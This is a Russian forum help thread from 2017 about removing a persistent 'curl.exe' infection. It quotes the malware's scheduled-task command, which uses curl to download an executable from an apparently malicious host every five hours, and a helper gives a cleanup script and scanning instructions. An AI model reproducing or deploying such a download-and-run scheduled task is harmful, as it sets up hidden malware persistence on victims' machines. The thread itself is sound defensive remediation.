Вирус curl.exe

**yarslva** · 19.07.2017, 15:35

Добрый день!
Изначально было скачано немалое количество вирусов, однако впоследствии все, кроме curl.exe, были удалены. Удаленные вирусы открывали рекламу в браузере, а действие этого вируса - непонятно. Предположительно, процесс слушает или шлет данные на открытые порты в сети или по интернету. Сам вирус не обнаруживается проверкой антвирусами системы(защитник Windows, Avast, Zemana AntiMalware, Security Task Manager), его видно лишь в библиотеке планировщика заданий. В ней видно две задачи curl(действие C:\Users\User\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\User\AppData\Roaming\curl\curl.exe") и curls(действие C:\Users\User\AppData\Roaming\curl\curl.exe). Частота повтора каждые 5 часов после запуска. При попытке удалить задания всплывает ошибка "у пользовательской учетной записи нет прав на удаление этого задания", даже в учетной записи администратора.
Также папку curl нельзя найти по пути C:\Users\User\AppData\Roaming\curl (выдается ошибка Windows не удается найти "C:\Users\User\AppData\Roaming\curl") и в папке C:\Windows\System32\Tasks.
Заранее благодарю.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 19.07.2017, 15:36

Уважаемый(ая) yarslva, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**thyrex** · 20.07.2017, 09:42

Выполните скрипт в AVZ

Код:

begin
 DeleteFile('C:\Windows\system32\Tasks\curls','64');
 DeleteFile('C:\Windows\system32\Tasks\curl','64');
ExecuteSysClean;
RebootWindows(false);
end.

Будет выполнена перезагрузка компьютера.

Пожалуйста, выполните ЕЩЕ РАЗ правила, прикрепите к сообщению НОВЫЕ логи Autologger

**yarslva** · 20.07.2017, 22:56

Спасибо, все чисто

**thyrex** · 21.07.2017, 01:30

Скачайте Farbar Recovery Scan Tool

и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.

Вирус curl.exe (заявка № 213973)

Опции темы